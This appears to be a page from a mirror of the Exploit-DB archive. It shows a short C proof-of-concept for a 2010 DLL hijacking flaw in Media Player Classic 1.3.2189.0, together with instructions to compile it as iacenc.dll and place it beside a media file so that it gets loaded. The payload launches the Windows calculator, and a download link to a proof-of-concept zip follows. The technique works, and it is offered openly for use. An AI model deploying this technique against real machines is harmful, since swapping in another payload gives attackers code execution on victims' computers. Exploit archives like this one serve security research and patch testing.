bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/14765.c
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

29 lines
No EOL
778 B
C
Raw Blame History

/*
Mediaplayer Classic 1.3.2189.0 Dll Hijack Exploit
By: Encrypt3d.M!nd
Date: 25\8\2010
Download: http://mpc-hc.sourceforge.net/
Details:
Compile the following code and rename it to iacenc.dll
and place file with one of the affected types in the same directory of the dll
Affected types: m2ts, m2t, flv, hdmov, 3gpp,3gp, mpeg, mp4v, mkv, m2v,rm , ram
(i guess all file types that mpc supports are affected)
Code :(used the one from this advisory:http://www.exploit-db.com/exploits/14758/):
*/
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void hook_startup() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
// POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14765.zip (mpc-poc.zip)
Reference in a new issue View git blame Copy permalink